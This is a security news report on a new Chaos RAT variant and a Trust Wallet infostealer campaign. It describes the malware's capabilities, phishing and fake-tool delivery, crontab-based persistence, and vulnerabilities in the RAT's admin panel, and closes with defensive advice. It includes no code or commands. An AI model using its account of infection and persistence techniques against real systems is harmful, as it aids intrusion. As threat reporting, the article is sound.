Security researchers are focusing on a new variant of a remote access trojan (RAT) called Chaos RAT, which has been used in recent attacks against both Windows and Linux systems.
According to findings shared by Acronis, the malware may have been distributed by tricking victims into downloading what appears to be a network troubleshooting tool for Linux environments.
“Chaos RAT is an open-source RAT written in Golang that provides cross-platform support for both Windows and Linux systems,” say security researchers Santiago Pontiroli, Gabor Molnar and Kirill Antonenko in a report shared with The Hacker News.
“Inspired by popular frameworks such as Cobalt Strike and Sliver, Chaos RAT offers an administrative panel where operators can build payloads, establish sessions and control compromised machines.”
Work on the remote administration tool began as early as 2017, but it did not attract much attention until December 2022, when it appeared in a campaign targeting public web applications hosted on Linux systems alongside the XMRig cryptocurrency miner.
Once installed, the malware connects to an external command-and-control server and waits for instructions that allow it to spawn reverse shells, upload, download or delete files, list files and directories, take screenshots, gather system information, lock, reboot or shut down the machine, and open arbitrary URLs. The latest released version of Chaos RAT is 5.0.3, published on May 31, 2024.
Acronis reports that Linux variants of the malware have since been found in the wild, often in connection with cryptocurrency-mining campaigns. Observed attack chains indicate Chaos RAT has been delivered to victims via phishing emails that include malicious links or attachments.
These artifacts are designed to install a malicious script that modifies the system scheduler (for example /etc/crontab) to periodically fetch malware, establishing persistence on infected hosts.
Early campaigns used this technique to deliver cryptocurrency miners and Chaos RAT separately, suggesting the RAT was primarily leveraged for reconnaissance and data collection on compromised machines, the researchers said.
Analysis of a recently uploaded sample to VirusTotal, submitted in January 2025 from India under the filename “NetworkAnalyzer.tar.gz,” raises the possibility that victims are being deceived into downloading the malware under the guise of a Linux network analysis or troubleshooting utility.
In addition, the administrative panel used to build payloads and manage infected hosts was found to contain a command injection vulnerability (CVE-2024-30850, CVSS score: 8.8) that could be chained with a cross-site scripting flaw (CVE-2024-31839, CVSS score: 4.8) to execute arbitrary code on the server with elevated privileges. Both vulnerabilities were addressed by Chaos RAT’s developers as of May 2024.
Although attribution for the use of Chaos RAT in real-world attacks remains unclear, this case highlights how threat actors continue to weaponize open-source tools, complicating efforts to link malicious activity to specific groups.
“What begins as a developer’s tool can quickly become a threat actor’s go-to resource,” the researchers commented. Using publicly available offensive tooling allows advanced persistent threat (APT) groups to blend in with widespread cybercriminal activity. Open-source malware provides a “good enough” toolbox that can be rapidly customized and deployed. When multiple actors reuse the same open-source malicious tools, distinguishing between them becomes difficult.
The disclosure coincides with the emergence of a separate campaign targeting desktop users of Trust Wallet, where fake installers distributed via deceptive download links, phishing emails or bundled software aim to collect browser credentials, extract data from local wallet files and browser extensions, execute commands, and act as persistent malware.
“Once installed, such malware can search for wallet files, capture clipboard data or monitor browser sessions to steal seed phrases or private keys,” says Point Wild researcher Kedar S. Pandit in a report published this week.
Organizations and users should remain vigilant: employ up-to-date endpoint protection, verify downloads from official sources, enable multi-factor authentication where possible, monitor system schedulers and network connections for unusual activity, and apply security patches promptly to reduce the risk posed by tools like Chaos RAT and related malicious campaigns.